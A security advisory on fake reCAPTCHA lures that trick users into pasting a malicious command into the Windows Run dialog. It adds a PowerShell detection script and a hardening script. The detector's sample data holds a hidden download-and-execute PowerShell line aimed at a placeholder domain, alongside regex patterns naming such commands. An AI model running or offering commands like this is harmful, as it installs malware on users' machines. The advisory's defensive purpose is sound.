Cyber Snapshot - Fake ReCAPTCHA Attacks
Several times a day, websites ask humans to verify that they are not robots by clicking a checkbox; the most common version of this prompt is Google's reCAPTCHA.
Because this is such a common occurrence, threat actors are now using fake CAPTCHAs in their attack methodology. The website still shows the prompt users are used to seeing, but it also instructs them to press a series of keystrokes (usually involving WIN+R, CTRL+V, and Enter) to prove that they are human. Those keystrokes open the Run dialog, paste a command the website has placed on the clipboard, and execute it on the workstation. The command is usually a remote PowerShell script that downloads malware from an external website and runs it on the workstation.
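The sequence described above leaves a recognizable trace in process-creation telemetry: explorer.exe (the Run dialog) launching a shell whose command line hides its window, evaluates downloaded code, or both. The following script is an added example for defenders and is not part of the MC3 snapshot; the field names (ParentName, NewProcessName, CommandLine) are assumptions modelled on Security event 4688, and the sample records are constructed, not real telemetry.

```powershell
# Added example (not from the MC3 snapshot): flag process-creation records that match
# the fake-CAPTCHA pattern: explorer.exe launching PowerShell/cmd/mshta with a command
# line that hides the window, uses Invoke-Expression (iex) or an encoded command, or
# fetches content from the web. Field names are an assumption based on event 4688.
function Test-FakeCaptchaProcess {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [pscustomobject]$Record   # expects ParentName, NewProcessName, CommandLine
    )
    process {
        $cmd       = [string]$Record.CommandLine
        $isShell   = $Record.NewProcessName -match '\\(powershell|pwsh|cmd|mshta)\.exe$'
        $fromRun   = $Record.ParentName     -match '\\explorer\.exe$'
        $hidden    = $cmd -match '(?i)-w(indowstyle)?\s+h(idden)?\b'
        $evalsCode = $cmd -match '(?i)(\biex\b|invoke-expression|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})'
        $downloads = $cmd -match '(?i)(\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest|downloadstring|https?://)'

        # Count how many indicators fired; a parent of explorer.exe plus either code
        # evaluation or a download is enough to raise the record for review.
        $score = @($isShell, $fromRun, $hidden, $evalsCode, $downloads).Where({ $_ }).Count
        [pscustomobject]@{
            Suspicious  = ($isShell -and $fromRun -and ($evalsCode -or $downloads))
            Score       = $score
            ParentName  = $Record.ParentName
            CommandLine = $cmd
        }
    }
}

# Constructed sample records (not real telemetry). The first mimics a Run-dialog paste
# with a placeholder domain, the second is a scheduled task, the third a user console.
$samples = @(
    [pscustomobject]@{
        ParentName     = 'C:\Windows\explorer.exe'
        NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine    = 'powershell -w hidden -c "iex (irm https://lure.example.invalid/verify)"'
    }
    [pscustomobject]@{
        ParentName     = 'C:\Windows\System32\svchost.exe'
        NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine    = 'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1'
    }
    [pscustomobject]@{
        ParentName     = 'C:\Windows\explorer.exe'
        NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine    = 'powershell.exe'
    }
)

# Only the first record should be marked Suspicious.
$samples | Test-FakeCaptchaProcess | Format-Table -AutoSize
```

To run this against live data, pipe objects built from `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688}` (with command-line auditing enabled) or from EDR process events into `Test-FakeCaptchaProcess`; the Score column helps triage records that miss the strict `Suspicious` rule but still carry several indicators.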
Fake CAPTCHA prompts have been found on websites that users may trust and use regularly, such as local news websites. Some threat actors have purchased advertisement space from advertising networks used frequently by trusted websites that their targets may visit. Generally, the advertising network does not review the advertising content it serves, so malicious ads can be distributed through the network. When displayed, these malicious ads redirect the visitor from the trusted website to a malicious website that presents the fake CAPTCHA.
Compromised users have reported to the MC3 that they believed the trusted website was asking them to prove they were not a robot, so they thought nothing about doing what was requested.
To avoid detection, the fake CAPTCHA is shown only to a limited number of users (usually over a pre-determined period of time, or a certain number of times per day for a given geographic region). As a result, the website owner is usually not aware of an issue stemming from their website, and even an owner who wants to investigate a visitor's complaint is generally unable to reproduce it. The MC3 has reached out to several website owners and found that many are reluctant to remove advertising network content from their website due to potential loss of revenue.
Recommendations
- The WIN+R (Run), WIN+S (Search), and WIN+X (Power User Task Menu) shortcuts are often only used by power users within your organization. Use registry settings or group policy to disable these shortcut keys on your normal user workstations.
- Malware utilizing PowerShell will generally attempt to mask its functionality using two built-in aliases: iex (Invoke-Expression) and ii (Invoke-Item). Removing these aliases at the user profile level on workstations that do not commonly run PowerShell commands may prevent some malware from functioning properly.
- Setting the PowerShell execution policy to “Restricted” or “AllSigned” through group policy limits unknown script execution and prevents the user from accidentally running an unsigned script.
- Most malicious domains are registered for less than a month before they are used for a malicious purpose. If your web filtering or anti-malware software permits blocking outbound access to websites based on the age of the domain, this can be an effective method to prevent your users from reaching potentially malicious content.
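The first three recommendations can be applied and verified from one PowerShell script. The script below is an added example, not MC3 guidance or tooling; it uses the standard Explorer policy registry values (NoWinKeys, which turns off the Windows-key hotkeys as a group and so is broader than the three listed, and NoRun, which removes the Run box), writes the alias removal into the per-user profile, and sets the execution policy with Set-ExecutionPolicy. The function name and the -WhatIf preview are additions; in a domain, the group policy settings named in the recommendations take precedence over what this script sets.

```powershell
# Added example (not part of the MC3 snapshot): apply and audit the workstation
# hardening steps for fake-CAPTCHA attacks. Run elevated; use -WhatIf to preview.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [ValidateSet('Restricted', 'AllSigned')]
    [string]$ExecutionPolicy = 'AllSigned'
)

# 1. Turn off Windows-key hotkeys (covers Win+R, Win+S, Win+X) and remove the Run box
#    for the current user. NoWinKeys=1 is the registry form of the "Turn off Windows
#    Key hotkeys" policy; NoRun=1 is the "Remove Run menu from Start Menu" policy.
$explorerPolicy = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
if ($PSCmdlet.ShouldProcess($explorerPolicy, 'Disable Win-key hotkeys and Run box')) {
    New-Item -Path $explorerPolicy -Force | Out-Null
    Set-ItemProperty -Path $explorerPolicy -Name 'NoWinKeys' -Value 1 -Type DWord
    Set-ItemProperty -Path $explorerPolicy -Name 'NoRun'     -Value 1 -Type DWord
}

# 2. Remove the iex / ii aliases from every new session. Built-in aliases are
#    re-created each time PowerShell starts, so the removal has to live in the user
#    profile; -Force is required because these aliases are marked read-only.
$aliasBlock = @'
# Workstation hardening: drop aliases commonly used by fake-CAPTCHA payloads
Remove-Item -Path Alias:iex -Force -ErrorAction SilentlyContinue
Remove-Item -Path Alias:ii  -Force -ErrorAction SilentlyContinue
'@
$profilePath = $PROFILE.CurrentUserAllHosts
if ($PSCmdlet.ShouldProcess($profilePath, 'Add iex/ii alias removal to profile')) {
    $profileDir = Split-Path -Path $profilePath -Parent
    if (-not (Test-Path $profileDir)) { New-Item -ItemType Directory -Path $profileDir | Out-Null }
    $alreadyPresent = (Test-Path $profilePath) -and
                      (Select-String -Path $profilePath -Pattern 'Alias:iex' -Quiet)
    if (-not $alreadyPresent) { Add-Content -Path $profilePath -Value $aliasBlock }
}

# 3. Execution policy for the machine. Group policy ("Turn on Script Execution")
#    overrides this value when present; the cmdlet is used so a standalone host
#    gets the same setting.
if ($PSCmdlet.ShouldProcess('LocalMachine', "Set execution policy to $ExecutionPolicy")) {
    Set-ExecutionPolicy -ExecutionPolicy $ExecutionPolicy -Scope LocalMachine -Force
}

# Audit: report the resulting state. Alias columns reflect the current session;
# they only change after a new session loads the modified profile.
function Get-FakeCaptchaHardeningState {
    [pscustomobject]@{
        NoWinKeys       = (Get-ItemProperty -Path $explorerPolicy -Name NoWinKeys -ErrorAction SilentlyContinue).NoWinKeys
        NoRun           = (Get-ItemProperty -Path $explorerPolicy -Name NoRun     -ErrorAction SilentlyContinue).NoRun
        ProfileHardened = (Test-Path $profilePath) -and
                          (Select-String -Path $profilePath -Pattern 'Alias:iex' -Quiet)
        IexAliasPresent = [bool](Get-Alias -Name iex -ErrorAction SilentlyContinue)
        IiAliasPresent  = [bool](Get-Alias -Name ii  -ErrorAction SilentlyContinue)
        ExecutionPolicy = Get-ExecutionPolicy -Scope LocalMachine
    }
}
Get-FakeCaptchaHardeningState
```

Because NoWinKeys and NoRun are written under HKCU, they apply per user; for fleet-wide enforcement the same values belong in a user-configuration group policy, which also prevents a user from undoing them. Running with `-WhatIf` prints each intended change and then the audit object, which is a convenient way to check a workstation's current state without modifying it.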
April 1, 2025
CS-02-2025